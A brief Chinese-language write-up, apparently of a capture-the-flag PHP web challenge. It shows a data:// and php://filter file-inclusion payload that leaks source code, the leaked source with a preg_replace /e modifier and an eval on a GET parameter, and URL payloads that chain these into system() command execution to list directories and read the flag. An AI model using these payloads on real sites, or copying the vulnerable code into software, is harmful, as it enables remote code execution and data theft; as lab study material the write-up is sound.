这里我们构造payload
?text=data://text/plain,I%20have%20a%20dream&file=next.php
重新构造payload读取next.php源码
?text=data://text/plain,I%20have%20a%20dream&file=php://filter/read=convert.base64-encode/resource=next.php
解码后获得
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
function complex($re, $str) {
return preg_replace(
'/(' . $re . ')/ei',
'strtolower("\\1")',
$str
);
}
foreach($_GET as $re => $str) {
echo complex($re, $str). "\n";
}
function getFlag(){
@eval($_GET['cmd']);
}
从整个代码来看
这里就需要用到PHP正则表达式的逆向引用与子模式
现在开始构造payload
/?text=data://text/pain,I have a dream&file=next.php&\S*=${getFlag()}&cmd=system('ls');
直接去查看网站根目录
/?text=data://text/pain,I have a dream&file=next.php&\S*=${getFlag()}&cmd=system('ls ../../../../../');
找到flag
/?text=data://text/pain,I have a dream&file=next.php&\S*=${getFlag()}&cmd=system('cat ../../../../../flag');